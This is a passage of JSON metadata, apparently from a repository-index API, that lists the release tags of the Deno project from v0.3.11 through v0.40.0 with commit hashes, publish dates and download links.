d_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"